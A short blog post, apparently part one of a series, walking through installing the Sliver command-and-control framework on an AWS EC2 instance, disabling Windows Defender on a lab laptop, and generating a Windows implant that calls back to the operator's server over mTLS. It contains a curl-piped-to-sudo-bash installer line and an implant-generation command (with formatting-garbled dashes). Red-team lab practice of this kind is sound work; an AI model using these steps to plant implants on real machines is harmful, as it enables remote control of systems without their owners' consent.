Sliver 1/4 🐍

JayHill
5 min readNov 3, 2022

Intro

A walk-through on how to Install sliver in ec2, manually turn off windows defender & get an implant session on windows lab laptop used for testing.

By reading this you accept that I do not accept responsibility for how you use of this guide / tool and it should only be used for educational purposes only.

Installation
https://github.com/BishopFox/sliver

Open AWS
Connect to your instance via ssh.

Once connected update and upgrade your instance,

Use this one liner below to get up and running with the dependencies for sliver and start it.

curl https://sliver.sh/install|sudo bash

and then run sliver

Generating Implants

I typed: generate - -mtls <ec2ip> - -a x86 β€” os windows

--

--